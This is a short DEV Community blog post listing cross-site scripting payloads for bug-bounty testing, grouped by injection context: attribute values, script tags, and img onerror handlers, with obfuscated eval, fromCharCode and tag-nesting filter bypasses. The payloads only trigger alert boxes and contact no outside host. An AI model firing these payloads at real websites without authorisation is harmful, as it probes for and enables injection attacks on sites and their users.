DEV Community

Cover image for Useful XSS Payloads
vala broumand
vala broumand

Posted on

Useful XSS Payloads

In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.

You can use payloads below when you are dealing with a injection that goes inside the value of a input:

\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'
Enter fullscreen mode Exit fullscreen mode

Use these payloads when you are injecting inside a script tag

</script><img/src/onerror=alert(1)>
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
Enter fullscreen mode Exit fullscreen mode

And we have some common payloads here

// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

Enter fullscreen mode Exit fullscreen mode

Find Security and Bug Bounty Books in my telegram channel ==>


Top comments (0)